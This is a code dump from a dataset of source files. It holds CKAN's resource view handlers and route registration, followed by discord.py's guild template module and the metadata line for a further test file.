u'resource_views': resource_views,
u'current_resource_view': current_resource_view,
u'dataset_type': dataset_type,
u'pkg_dict': package,
u'package': package,
u'resource': resource,
u'pkg': pkg, # NB it is the current version of the dataset, so ignores
# activity_id. Still used though in resource views for
# backward compatibility
u'is_activity_archive': bool(activity_id),
}
template = _get_pkg_template(u'resource_template', dataset_type)
return base.render(template, extra_vars)
def download(package_type, id, resource_id, filename=None):
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
try:
rsc = get_action(u'resource_show')(context, {u'id': resource_id})
get_action(u'package_show')(context, {u'id': id})
except (NotFound, NotAuthorized):
return base.abort(404, _(u'Resource not found'))
if rsc.get(u'url_type') == u'upload':
upload = uploader.get_resource_uploader(rsc)
filepath = upload.get_path(rsc[u'id'])
resp = flask.send_file(filepath)
if rsc.get(u'mimetype'):
resp.headers[u'Content-Type'] = rsc[u'mimetype']
return resp
elif u'url' not in rsc:
return base.abort(404, _(u'No download is available'))
return h.redirect_to(rsc[u'url'])
class CreateView(MethodView):
def post(self, package_type, id):
save_action = request.form.get(u'save')
data = clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.form)))
)
data.update(clean_dict(
dict_fns.unflatten(tuplize_dict(parse_params(request.files)))
))
# we don't want to include save as it is part of the form
del data[u'save']
resource_id = data.pop(u'id')
context = {
u'model': model,
u'session': model.Session,
u'user': g.user,
u'auth_user_obj': g.userobj
}
data_provided = False
for key, value in six.iteritems(data):
if (
(value or isinstance(value, cgi.FieldStorage))
and key != u'resource_type'):
data_provided = True
break
if not data_provided and save_action != u"go-dataset-complete":
if save_action == u'go-dataset':
return h.redirect_to(u'{}.edit'.format(package_type), id=id)
try:
data_dict = get_action(u'package_show')(context, {u'id': id})
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to update dataset'))
except NotFound:
return base.abort(
404,
_(u'The dataset {id} could not be found.').format(id=id)
)
if not len(data_dict[u'resources']):
msg = _(u'You must add at least one data resource')
errors = {}
error_summary = {_(u'Error'): msg}
return self.get(package_type, id, data, errors, error_summary)
data_dict = get_action(u'package_show')(context, {u'id': id})
get_action(u'package_update')(
dict(context, allow_state_change=True),
dict(data_dict, state=u'active')
)
return h.redirect_to(u'{}.read'.format(package_type), id=id)
data[u'package_id'] = id
try:
if resource_id:
data[u'id'] = resource_id
get_action(u'resource_update')(context, data)
else:
get_action(u'resource_create')(context, data)
except ValidationError as e:
errors = e.error_dict
error_summary = e.error_summary
if data.get(u'url_type') == u'upload' and data.get(u'url'):
data[u'url'] = u''
data[u'url_type'] = u''
data[u'previous_upload'] = True
return self.get(package_type, id, data, errors, error_summary)
except NotAuthorized:
return base.abort(403, _(u'Unauthorized to create a resource'))
except NotFound:
return base.abort(
404, _(u'The dataset {id} could not be found.').format(id=id)
)
if save_action == u'go-metadata':
data_dict = get_action(u'package_show')(context, {u'id': id})
get_action(u'package_update')(
dict(context, allow_state_change=True),
dict(data_dict, state=u'active')
)
return h.redirect_to(u'{}.read'.format(package_type), id=id)
elif save_action == u'go-dataset':
return h.redirect_to(u'{}.edit'.format(package_type), id=id)
elif save_action == u'go-dataset-complete':
return h.redirect_to(u'{}.read'.format(package_type), id=id)
else:
return h.redirect_to(
u'{}_resource.new'.format(package_type),
id=id
)
    def get(
        self, package_type, id, data=None, errors=None, error_summary=None
    ):
        """Render the "new resource" form for dataset *id*.

        ``data``/``errors``/``error_summary`` carry form state back from a
        failed POST so the user's input can be re-rendered.
        """
        context = {
            u'model': model,
            u'session': model.Session,
            u'user': g.user,
            u'auth_user_obj': g.userobj
        }
        # The dataset must exist before a resource form can be shown for it.
        try:
            pkg_dict = get_action(u'package_show')(context, {u'id': id})
        except NotFound:
            return base.abort(
                404, _(u'The dataset {id} could not be found.').format(id=id)
            )
        # Only users allowed to create resources on this package may see
        # the form.
        try:
            check_access(
                u'resource_create', context, {u"package_id": pkg_dict["id"]}
            )
        except NotAuthorized:
            return base.abort(
                403, _(u'Unauthorized to create a resource for this package')
            )
        # Prefer the dataset's own type (supports custom dataset types).
        package_type = pkg_dict[u'type'] or package_type
        errors = errors or {}
        error_summary = error_summary or {}
        extra_vars = {
            u'data': data,
            u'errors': errors,
            u'error_summary': error_summary,
            u'action': u'new',
            u'resource_form_snippet': _get_pkg_template(
                u'resource_form', package_type
            ),
            u'dataset_type': package_type,
            u'pkg_name': id,
            u'pkg_dict': pkg_dict
        }
        template = u'package/new_resource_not_draft.html'
        # Draft datasets use the multi-stage "new resource" wizard template.
        if pkg_dict[u'state'].startswith(u'draft'):
            extra_vars[u'stage'] = ['complete', u'active']
            template = u'package/new_resource.html'
        return base.render(template, extra_vars)
class EditView(MethodView):
    """Edit an existing resource of a dataset.

    GET renders the edit form; POST persists the submitted changes.
    """

    def _prepare(self, id):
        """Build the action context and verify the user may update
        dataset *id*; aborts with 403 otherwise.
        """
        context = {
            u'model': model,
            u'session': model.Session,
            u'api_version': 3,
            u'for_edit': True,
            u'user': g.user,
            u'auth_user_obj': g.userobj
        }
        try:
            check_access(u'package_update', context, {u'id': id})
        except NotAuthorized:
            return base.abort(
                403,
                _(u'User %r not authorized to edit %s') % (g.user, id)
            )
        return context

    def post(self, package_type, id, resource_id):
        """Save the submitted resource form (update, or create when no
        ``resource_id`` is given) and redirect to the resource page.
        """
        context = self._prepare(id)
        # Merge regular form fields and uploaded files into one data dict.
        data = clean_dict(
            dict_fns.unflatten(tuplize_dict(parse_params(request.form)))
        )
        data.update(clean_dict(
            dict_fns.unflatten(tuplize_dict(parse_params(request.files)))
        ))
        # 'save' is the submit button name, not a resource field.
        del data[u'save']
        data[u'package_id'] = id
        try:
            if resource_id:
                data[u'id'] = resource_id
                get_action(u'resource_update')(context, data)
            else:
                get_action(u'resource_create')(context, data)
        except ValidationError as e:
            # Re-render the form with the validation errors shown.
            errors = e.error_dict
            error_summary = e.error_summary
            return self.get(
                package_type, id, resource_id, data, errors, error_summary
            )
        except NotAuthorized:
            return base.abort(403, _(u'Unauthorized to edit this resource'))
        return h.redirect_to(
            u'{}_resource.read'.format(package_type),
            id=id, resource_id=resource_id
        )

    def get(
        self,
        package_type,
        id,
        resource_id,
        data=None,
        errors=None,
        error_summary=None
    ):
        """Render the resource edit form.

        ``data``/``errors``/``error_summary`` carry form state from a
        failed POST.
        """
        context = self._prepare(id)
        pkg_dict = get_action(u'package_show')(context, {u'id': id})
        try:
            resource_dict = get_action(u'resource_show')(
                context, {
                    u'id': resource_id
                }
            )
        except NotFound:
            return base.abort(404, _(u'Resource not found'))
        if pkg_dict[u'state'].startswith(u'draft'):
            # Draft datasets still go through the "new resource" wizard flow.
            return CreateView().get(package_type, id, data=resource_dict)

        # resource is fully created
        resource = resource_dict
        # set the form action
        form_action = h.url_for(
            u'{}_resource.edit'.format(package_type),
            resource_id=resource_id, id=id
        )
        if not data:
            data = resource_dict

        package_type = pkg_dict[u'type'] or package_type
        errors = errors or {}
        error_summary = error_summary or {}
        extra_vars = {
            u'data': data,
            u'errors': errors,
            u'error_summary': error_summary,
            u'action': u'edit',
            u'resource_form_snippet': _get_pkg_template(
                u'resource_form', package_type
            ),
            u'dataset_type': package_type,
            u'resource': resource,
            u'pkg_dict': pkg_dict,
            u'form_action': form_action
        }
        return base.render(u'package/resource_edit.html', extra_vars)
class DeleteView(MethodView):
    """Confirm (GET) and perform (POST) deletion of a resource."""

    def _prepare(self, id):
        """Build the action context and verify the user may delete the
        package; aborts with 403 otherwise.
        """
        context = {
            u'model': model,
            u'session': model.Session,
            u'user': g.user,
            u'auth_user_obj': g.userobj
        }
        try:
            check_access(u'package_delete', context, {u'id': id})
        except NotAuthorized:
            return base.abort(
                403,
                _(u'Unauthorized to delete package %s') % u''
            )
        return context

    def post(self, package_type, id, resource_id):
        """Delete the resource (unless the user pressed "cancel") and
        redirect back to the dataset.
        """
        if u'cancel' in request.form:
            return h.redirect_to(
                u'{}_resource.edit'.format(package_type),
                resource_id=resource_id, id=id
            )

        context = self._prepare(id)
        try:
            get_action(u'resource_delete')(context, {u'id': resource_id})
            h.flash_notice(_(u'Resource has been deleted.'))
            pkg_dict = get_action(u'package_show')(None, {u'id': id})
            if pkg_dict[u'state'].startswith(u'draft'):
                # Drafts go back to the "add resource" step of the wizard.
                return h.redirect_to(
                    u'{}_resource.new'.format(package_type),
                    id=id
                )
            else:
                return h.redirect_to(u'{}.read'.format(package_type), id=id)
        except NotAuthorized:
            return base.abort(
                403,
                _(u'Unauthorized to delete resource %s') % u''
            )
        except NotFound:
            return base.abort(404, _(u'Resource not found'))

    def get(self, package_type, id, resource_id):
        """Render the delete-confirmation page for the resource."""
        context = self._prepare(id)
        try:
            resource_dict = get_action(u'resource_show')(
                context, {
                    u'id': resource_id
                }
            )
            pkg_id = id
        except NotAuthorized:
            return base.abort(
                403,
                _(u'Unauthorized to delete resource %s') % u''
            )
        except NotFound:
            return base.abort(404, _(u'Resource not found'))

        # TODO: remove (legacy template globals)
        g.resource_dict = resource_dict
        g.pkg_id = pkg_id

        return base.render(
            u'package/confirm_delete_resource.html', {
                u'dataset_type': _get_package_type(id),
                u'resource_dict': resource_dict,
                u'pkg_id': pkg_id
            }
        )
def views(package_type, id, resource_id):
    """List the configured views of a resource (package editors only)."""
    package_type = _get_package_type(id)
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'for_view': True,
        u'auth_user_obj': g.userobj
    }
    data_dict = {u'id': id}

    # Managing views requires edit rights on the dataset.
    try:
        check_access(u'package_update', context, data_dict)
    except NotAuthorized:
        return base.abort(
            403,
            _(u'User %r not authorized to edit %s') % (g.user, id)
        )
    # check if package exists
    try:
        pkg_dict = get_action(u'package_show')(context, data_dict)
        pkg = context[u'package']
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Dataset not found'))

    try:
        resource = get_action(u'resource_show')(context, {u'id': resource_id})
        views = get_action(u'resource_view_list')(
            context, {
                u'id': resource_id
            }
        )

    except NotFound:
        return base.abort(404, _(u'Resource not found'))
    except NotAuthorized:
        return base.abort(403, _(u'Unauthorized to read resource %s') % id)

    _setup_template_variables(context, {u'id': id}, package_type=package_type)

    # TODO: remove (legacy template globals)
    g.pkg_dict = pkg_dict
    g.pkg = pkg
    g.resource = resource
    g.views = views

    return base.render(
        u'package/resource_views.html', {
            u'pkg_dict': pkg_dict,
            u'pkg': pkg,
            u'resource': resource,
            u'views': views
        }
    )
def view(package_type, id, resource_id, view_id=None):
    """Render a single resource view for embedding.

    The view definition comes either from the ``resource_view`` request
    parameter (a JSON blob, used for live previews) or, failing that,
    from ``view_id``.
    """
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'auth_user_obj': g.userobj
    }
    try:
        package = get_action(u'package_show')(context, {u'id': id})
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Dataset not found'))
    try:
        resource = get_action(u'resource_show')(context, {u'id': resource_id})
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Resource not found'))

    view = None
    # NOTE(review): this uses ``request.params`` while sibling functions use
    # ``request.args`` — presumably CKAN's request wrapper provides
    # ``params``; confirm before changing.
    if request.params.get(u'resource_view', u''):
        try:
            view = json.loads(request.params.get(u'resource_view', u''))
        except ValueError:
            return base.abort(409, _(u'Bad resource view data'))
    elif view_id:
        try:
            view = get_action(u'resource_view_show')(context, {u'id': view_id})
        except (NotFound, NotAuthorized):
            return base.abort(404, _(u'Resource view not found'))

    if not view or not isinstance(view, dict):
        return base.abort(404, _(u'Resource view not supplied'))

    return h.rendered_resource_view(view, resource, package, embed=True)
# FIXME: could anyone think of a better name?
class EditResourceViewView(MethodView):
    """Create or edit a resource view (chart, table, image, ...).

    Serves both the ``new_view`` route (no ``view_id``) and the
    ``edit_view/<view_id>`` route: GET renders the form, POST saves or
    deletes the view and optionally shows a preview.
    """

    def _prepare(self, id, resource_id):
        """Authorise the user and load the package/resource data shared
        by GET and POST; returns ``(context, extra_vars)``.
        """
        context = {
            u'model': model,
            u'session': model.Session,
            u'user': g.user,
            u'for_view': True,
            u'auth_user_obj': g.userobj
        }

        # update resource should tell us early if the user has privileges.
        try:
            check_access(u'resource_update', context, {u'id': resource_id})
        except NotAuthorized:
            return base.abort(
                403,
                _(u'User %r not authorized to edit %s') % (g.user, id)
            )

        # get resource and package data
        try:
            pkg_dict = get_action(u'package_show')(context, {u'id': id})
            pkg = context[u'package']
        except (NotFound, NotAuthorized):
            return base.abort(404, _(u'Dataset not found'))
        try:
            resource = get_action(u'resource_show')(
                context, {
                    u'id': resource_id
                }
            )
        except (NotFound, NotAuthorized):
            return base.abort(404, _(u'Resource not found'))

        # TODO: remove (legacy template globals)
        g.pkg_dict = pkg_dict
        g.pkg = pkg
        g.resource = resource
        extra_vars = dict(
            data={},
            errors={},
            error_summary={},
            view_type=None,
            to_preview=False,
            pkg_dict=pkg_dict,
            pkg=pkg,
            resource=resource
        )
        return context, extra_vars

    def post(self, package_type, id, resource_id, view_id=None):
        """Create, update or delete a resource view from the submitted
        form, then redirect to the views list (or re-render on error or
        preview).
        """
        context, extra_vars = self._prepare(id, resource_id)
        data = clean_dict(
            dict_fns.unflatten(
                tuplize_dict(
                    parse_params(request.form, ignore_keys=CACHE_PARAMETERS)
                )
            )
        )
        data.pop(u'save', None)

        to_preview = data.pop(u'preview', False)
        if to_preview:
            context[u'preview'] = True
        to_delete = data.pop(u'delete', None)
        data[u'resource_id'] = resource_id
        data[u'view_type'] = request.args.get(u'view_type')

        try:
            if to_delete:
                data[u'id'] = view_id
                get_action(u'resource_view_delete')(context, data)
            elif view_id:
                data[u'id'] = view_id
                data = get_action(u'resource_view_update')(context, data)
            else:
                data = get_action(u'resource_view_create')(context, data)
        except ValidationError as e:
            # Could break preview if validation error
            to_preview = False
            # BUG FIX: a trailing comma here previously turned the error
            # dict into a one-element tuple, breaking error rendering in
            # the template.
            extra_vars[u'errors'] = e.error_dict
            extra_vars[u'error_summary'] = e.error_summary
        except NotAuthorized:
            # This should never happen unless the user maliciously changed
            # the resource_id in the url.
            return base.abort(403, _(u'Unauthorized to edit resource'))
        else:
            if not to_preview:
                return h.redirect_to(
                    u'{}_resource.views'.format(package_type),
                    id=id, resource_id=resource_id
                )
        extra_vars[u'data'] = data
        extra_vars[u'to_preview'] = to_preview
        return self.get(package_type, id, resource_id, view_id, extra_vars)

    def get(
        self, package_type, id, resource_id, view_id=None, post_extra=None
    ):
        """Render the new/edit view form.

        ``post_extra`` carries form state from a failed or previewing
        POST.
        """
        context, extra_vars = self._prepare(id, resource_id)
        to_preview = extra_vars[u'to_preview']
        if post_extra:
            extra_vars.update(post_extra)

        package_type = _get_package_type(id)
        data = extra_vars[u'data'] if u'data' in extra_vars else None

        if data and u'view_type' in data:
            view_type = data.get(u'view_type')
        else:
            view_type = request.args.get(u'view_type')

        # view_id exists only when updating
        if view_id:
            if not data or not view_type:
                try:
                    view_data = get_action(u'resource_view_show')(
                        context, {
                            u'id': view_id
                        }
                    )
                    view_type = view_data[u'view_type']
                    if data:
                        data.update(view_data)
                    else:
                        data = view_data
                except (NotFound, NotAuthorized):
                    return base.abort(404, _(u'View not found'))

            # might as well preview when loading good existing view
            if not extra_vars[u'errors']:
                to_preview = True

        data[u'view_type'] = view_type
        view_plugin = lib_datapreview.get_view_plugin(view_type)
        if not view_plugin:
            return base.abort(404, _(u'View Type Not found'))

        _setup_template_variables(
            context, {u'id': id}, package_type=package_type
        )

        data_dict = {
            u'package': extra_vars[u'pkg_dict'],
            u'resource': extra_vars[u'resource'],
            u'resource_view': data
        }

        view_template = view_plugin.view_template(context, data_dict)
        form_template = view_plugin.form_template(context, data_dict)

        extra_vars.update({
            u'form_template': form_template,
            u'view_template': view_template,
            u'data': data,
            u'to_preview': to_preview,
            u'datastore_available': plugins.plugin_loaded(u'datastore')
        })
        # Let the view plugin contribute its own template variables.
        extra_vars.update(
            view_plugin.setup_template_variables(context, data_dict) or {}
        )
        extra_vars.update(data_dict)

        if view_id:
            return base.render(u'package/edit_view.html', extra_vars)

        return base.render(u'package/new_view.html', extra_vars)
def _parse_recline_state(params):
    """Reconstruct a recline (data explorer) state dict from the request
    query string.

    Returns the state dict, or ``None`` when the ``state_version`` is not
    supported.

    NOTE(review): the ``params`` argument is ignored and the flask
    ``request.args`` global is read instead — presumably intentional, but
    worth confirming against the callers.
    """
    state_version = int(request.args.get(u'state_version', u'1'))
    if state_version != 1:
        return None

    recline_state = {}
    for k, v in request.args.items():
        try:
            v = h.json.loads(v)
        except ValueError:
            # Plain (non-JSON) values are kept as strings.
            pass
        recline_state[k] = v
    recline_state.pop(u'width', None)
    recline_state.pop(u'height', None)
    recline_state[u'readOnly'] = True

    # previous versions of recline setup used elasticsearch_url attribute
    # for data api url - see http://trac.ckan.org/ticket/2639
    # fix by relocating this to url attribute which is the default location
    if u'dataset' in recline_state and u'elasticsearch_url' in recline_state[
        u'dataset'
    ]:
        recline_state[u'dataset'][u'url'] = recline_state[u'dataset'][
            u'elasticsearch_url'
        ]

    # Ensure only the currentView is available
    # default to grid view if none specified
    if not recline_state.get(u'currentView', None):
        recline_state[u'currentView'] = u'grid'
    # BUG FIX: iterate over a snapshot of the keys — popping from the dict
    # while iterating its live keys() view raises
    # "RuntimeError: dictionary changed size during iteration" on Python 3.
    for k in list(recline_state.keys()):
        if k.startswith(u'view-') and \
                not k.endswith(recline_state[u'currentView']):
            recline_state.pop(k)
    return recline_state
def embedded_dataviewer(package_type, id, resource_id, width=500, height=500):
    """Render the embeddable recline-based data viewer for a resource."""
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'auth_user_obj': g.userobj
    }
    try:
        resource = get_action(u'resource_show')(context, {u'id': resource_id})
        package = get_action(u'package_show')(context, {u'id': id})
        resource_json = h.json.dumps(resource)

        # double check that the resource belongs to the specified package
        if not resource[u'id'] in [r[u'id'] for r in package[u'resources']]:
            raise NotFound
        dataset_type = package[u'type'] or package_type

    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Resource not found'))

    # Construct the recline state
    state_version = int(request.args.get(u'state_version', u'1'))
    recline_state = _parse_recline_state(request.args)
    if recline_state is None:
        return base.abort(
            400, (
                u'"state" parameter must be a valid recline '
                u'state (version %d)' % state_version
            )
        )

    recline_state = h.json.dumps(recline_state)

    # Clamp the requested embed size to a sane minimum of 100px.
    width = max(int(request.args.get(u'width', width)), 100)
    height = max(int(request.args.get(u'height', height)), 100)
    embedded = True

    # TODO: remove (legacy template globals)
    g.resource = resource
    g.package = package
    g.resource_json = resource_json
    g.recline_state = recline_state
    g.width = width
    g.height = height
    g.embedded = embedded

    return base.render(
        u'package/resource_embedded_dataviewer.html', {
            u'dataset_type': dataset_type,
            u'resource': resource,
            u'package': package,
            u'resource_json': resource_json,
            u'width': width,
            u'height': height,
            u'embedded': embedded,
            u'recline_state': recline_state
        }
    )
def datapreview(package_type, id, resource_id):
    """Render the legacy data-preview page for a resource using the
    first preview plugin that claims it.
    """
    context = {
        u'model': model,
        u'session': model.Session,
        u'user': g.user,
        u'auth_user_obj': g.userobj
    }
    try:
        resource = get_action(u'resource_show')(context, {u'id': resource_id})
        package = get_action(u'package_show')(context, {u'id': id})

        data_dict = {u'resource': resource, u'package': package}

        preview_plugin = lib_datapreview.get_preview_plugin(data_dict)

        if preview_plugin is None:
            # No plugin can preview this resource type/format.
            return base.abort(409, _(u'No preview has been defined.'))

        preview_plugin.setup_template_variables(context, data_dict)
        resource_json = json.dumps(resource)
        dataset_type = package[u'type'] or package_type

        # TODO: remove (legacy template globals)
        g.resource = resource
        g.package = package
        g.resource_json = resource_json
    except (NotFound, NotAuthorized):
        return base.abort(404, _(u'Resource not found'))
    else:
        return base.render(
            preview_plugin.preview_template(context, data_dict), {
                u'dataset_type': dataset_type,
                u'resource': resource,
                u'package': package,
                u'resource_json': resource_json
            }
        )
def register_dataset_plugin_rules(blueprint):
    """Attach every resource-related route to *blueprint*.

    The rules (and their registration order) are identical to the
    original hand-written sequence; they are just expressed as data.
    """
    view_editor = EditResourceViewView.as_view(str(u'edit_view'))

    # (rule, view function, extra keyword arguments) in registration order.
    route_table = [
        (u'/new', CreateView.as_view(str(u'new')), {}),
        (u'/<resource_id>', read, {'strict_slashes': False}),
        (u'/<resource_id>/edit', EditView.as_view(str(u'edit')), {}),
        (u'/<resource_id>/delete', DeleteView.as_view(str(u'delete')), {}),
        (u'/<resource_id>/download', download, {}),
        (u'/<resource_id>/views', views, {}),
        (u'/<resource_id>/view', view, {}),
        (u'/<resource_id>/view/<view_id>', view, {}),
        (u'/<resource_id>/download/<filename>', download, {}),
        (u'/<resource_id>/new_view', view_editor, {}),
        (u'/<resource_id>/edit_view/<view_id>', view_editor, {}),
        (u'/<resource_id>/embed', embedded_dataviewer, {}),
        (
            u'/<resource_id>/viewer',
            embedded_dataviewer,
            {'defaults': {u'width': u"960", u'height': u"800"}},
        ),
        (u'/<resource_id>/preview', datapreview, {}),
    ]
    for rule, view_func, kwargs in route_table:
        blueprint.add_url_rule(rule, view_func=view_func, **kwargs)
# Attach the resource routes to both the plain and the
# dataset-type-prefixed blueprints.
register_dataset_plugin_rules(resource)
register_dataset_plugin_rules(prefixed_resource)
| true | true |
1c3333803a99fbaa0e4a9b9243428d076cd7b431 | 5,362 | py | Python | discord/template.py | jonasbohmann/discord.py | a63ced9c6910b92acc06e6c0d9f50f1ce495b18b | [
"MIT"
] | 2 | 2020-11-19T09:41:26.000Z | 2021-12-07T12:08:55.000Z | discord/template.py | jonasbohmann/discord.py | a63ced9c6910b92acc06e6c0d9f50f1ce495b18b | [
"MIT"
] | null | null | null | discord/template.py | jonasbohmann/discord.py | a63ced9c6910b92acc06e6c0d9f50f1ce495b18b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from .utils import parse_time, _get_as_snowflake, _bytes_to_base64_data
from .enums import VoiceRegion
from .guild import Guild
__all__ = (
'Template',
)
class _FriendlyHttpAttributeErrorHelper:
    """Stand-in for the HTTP client on a partial state: accessing any
    attribute (i.e. any HTTP method) raises a clear AttributeError.
    """

    __slots__ = ()

    def __getattr__(self, attr):
        raise AttributeError('PartialTemplateState does not support http methods.')
class _PartialTemplateState:
    """Read-only proxy around a real connection state, used when building
    a template's ``source_guild``.

    It forwards a small set of harmless attributes from the wrapped state
    and blocks anything that would perform HTTP requests or mutate caches.
    """

    def __init__(self, *, state):
        self.__state = state
        # Any HTTP method access raises a friendly AttributeError.
        self.http = _FriendlyHttpAttributeErrorHelper()

    @property
    def is_bot(self):
        return self.__state.is_bot

    @property
    def shard_count(self):
        return self.__state.shard_count

    @property
    def user(self):
        return self.__state.user

    @property
    def self_id(self):
        return self.__state.user.id

    @property
    def member_cache_flags(self):
        return self.__state.member_cache_flags

    def store_emoji(self, guild, packet):
        # Emojis from a serialized template guild are not cached.
        return None

    def _get_voice_client(self, id):
        return None

    def _get_message(self, id):
        return None

    async def query_members(self, **kwargs):
        # Member querying is meaningless for a template's source guild.
        return []

    def __getattr__(self, attr):
        raise AttributeError('PartialTemplateState does not support {0!r}.'.format(attr))
class Template:
    """Represents a Discord template.

    .. versionadded:: 1.4

    Attributes
    -----------
    code: :class:`str`
        The template code.
    uses: :class:`int`
        How many times the template has been used.
    name: :class:`str`
        The name of the template.
    description: :class:`str`
        The description of the template.
    creator: :class:`User`
        The creator of the template.
    created_at: :class:`datetime.datetime`
        When the template was created.
    updated_at: :class:`datetime.datetime`
        When the template was last updated (referred to as "last synced" in the client).
    source_guild: :class:`Guild`
        The source guild.
    """

    def __init__(self, *, state, data):
        self._state = state

        self.code = data['code']
        self.uses = data['usage_count']
        self.name = data['name']
        self.description = data['description']
        creator_data = data.get('creator')
        self.creator = None if creator_data is None else self._state.store_user(creator_data)

        self.created_at = parse_time(data.get('created_at'))
        self.updated_at = parse_time(data.get('updated_at'))

        # Renamed from ``id`` so the builtin is not shadowed.
        guild_id = _get_as_snowflake(data, 'source_guild_id')

        source_serialised = data['serialized_source_guild']
        source_serialised['id'] = guild_id

        # The source guild is built from serialized data, so give it a
        # partial state that rejects HTTP operations instead of the real
        # one (renamed from ``state`` so the parameter is not rebound).
        partial_state = _PartialTemplateState(state=self._state)

        self.source_guild = Guild(data=source_serialised, state=partial_state)

    def __repr__(self):
        # f-string produces byte-identical output to the old
        # '...{0.code!r}...'.format(self) form.
        return (
            f'<Template code={self.code!r} uses={self.uses} name={self.name!r}'
            f' creator={self.creator!r} source_guild={self.source_guild!r}>'
        )

    async def create_guild(self, name, region=None, icon=None):
        """|coro|

        Creates a :class:`.Guild` using the template.

        Bot accounts in more than 10 guilds are not allowed to create guilds.

        Parameters
        ----------
        name: :class:`str`
            The name of the guild.
        region: :class:`.VoiceRegion`
            The region for the voice communication server.
            Defaults to :attr:`.VoiceRegion.us_west`.
        icon: :class:`bytes`
            The :term:`py:bytes-like object` representing the icon. See :meth:`.ClientUser.edit`
            for more details on what is expected.

        Raises
        ------
        :exc:`.HTTPException`
            Guild creation failed.
        :exc:`.InvalidArgument`
            Invalid icon image format given. Must be PNG or JPG.

        Returns
        -------
        :class:`.Guild`
            The guild created. This is not the same guild that is
            added to cache.
        """
        if icon is not None:
            icon = _bytes_to_base64_data(icon)

        if region is None:
            region = VoiceRegion.us_west.value
        else:
            region = region.value

        data = await self._state.http.create_from_template(self.code, name, region, icon)
        return Guild(data=data, state=self._state)
| 31.356725 | 96 | 0.657404 |
from .utils import parse_time, _get_as_snowflake, _bytes_to_base64_data
from .enums import VoiceRegion
from .guild import Guild
__all__ = (
'Template',
)
class _FriendlyHttpAttributeErrorHelper:
    """Stand-in for the HTTP client on a partial state: accessing any
    attribute (i.e. any HTTP method) raises a clear AttributeError.
    """

    __slots__ = ()

    def __getattr__(self, attr):
        raise AttributeError('PartialTemplateState does not support http methods.')
class _PartialTemplateState:
    """Read-only proxy around a real connection state, used when building
    a template's ``source_guild``; forwards harmless attributes and blocks
    anything that would perform HTTP requests or mutate caches.
    """

    def __init__(self, *, state):
        self.__state = state
        # Any HTTP method access raises a friendly AttributeError.
        self.http = _FriendlyHttpAttributeErrorHelper()

    @property
    def is_bot(self):
        return self.__state.is_bot

    @property
    def shard_count(self):
        return self.__state.shard_count

    @property
    def user(self):
        return self.__state.user

    @property
    def self_id(self):
        return self.__state.user.id

    @property
    def member_cache_flags(self):
        return self.__state.member_cache_flags

    def store_emoji(self, guild, packet):
        # Emojis from a serialized template guild are not cached.
        return None

    def _get_voice_client(self, id):
        return None

    def _get_message(self, id):
        return None

    async def query_members(self, **kwargs):
        # Member querying is meaningless for a template's source guild.
        return []

    def __getattr__(self, attr):
        raise AttributeError('PartialTemplateState does not support {0!r}.'.format(attr))
class Template:
    """Represents a Discord guild template: a snapshot of a guild's
    structure that can be used to create new guilds.
    """

    def __init__(self, *, state, data):
        # ``state`` is the library connection state; ``data`` is the raw
        # template payload from the API.
        self._state = state
        self.code = data['code']
        self.uses = data['usage_count']
        self.name = data['name']
        self.description = data['description']
        creator_data = data.get('creator')
        self.creator = None if creator_data is None else self._state.store_user(creator_data)
        self.created_at = parse_time(data.get('created_at'))
        self.updated_at = parse_time(data.get('updated_at'))
        id = _get_as_snowflake(data, 'source_guild_id')
        source_serialised = data['serialized_source_guild']
        source_serialised['id'] = id
        # Build the source guild against a partial state that blocks HTTP.
        state = _PartialTemplateState(state=self._state)
        self.source_guild = Guild(data=source_serialised, state=state)

    def __repr__(self):
        return '<Template code={0.code!r} uses={0.uses} name={0.name!r}' \
               ' creator={0.creator!r} source_guild={0.source_guild!r}>'.format(self)

    async def create_guild(self, name, region=None, icon=None):
        """|coro| Create a new :class:`Guild` from this template.

        ``region`` defaults to ``VoiceRegion.us_west``; ``icon`` is a
        bytes-like image, base64-encoded before sending.
        """
        if icon is not None:
            icon = _bytes_to_base64_data(icon)
        if region is None:
            region = VoiceRegion.us_west.value
        else:
            region = region.value
        data = await self._state.http.create_from_template(self.code, name, region, icon)
        return Guild(data=data, state=self._state)
| true | true |
1c333452ebe6f0e0869a6644f68e01a17c05280f | 3,226 | py | Python | services/scheduling/tests/jrpc/test_compatibility.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 4 | 2015-03-23T16:34:53.000Z | 2017-12-12T11:41:54.000Z | services/scheduling/tests/jrpc/test_compatibility.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
] | 42 | 2015-01-08T22:21:04.000Z | 2021-12-13T19:48:44.000Z | services/scheduling/tests/jrpc/test_compatibility.py | rtubio/server | 3bb15f4d4dcd543d6f95d1fda2cb737de0bb9a9b | [
"Apache-2.0"
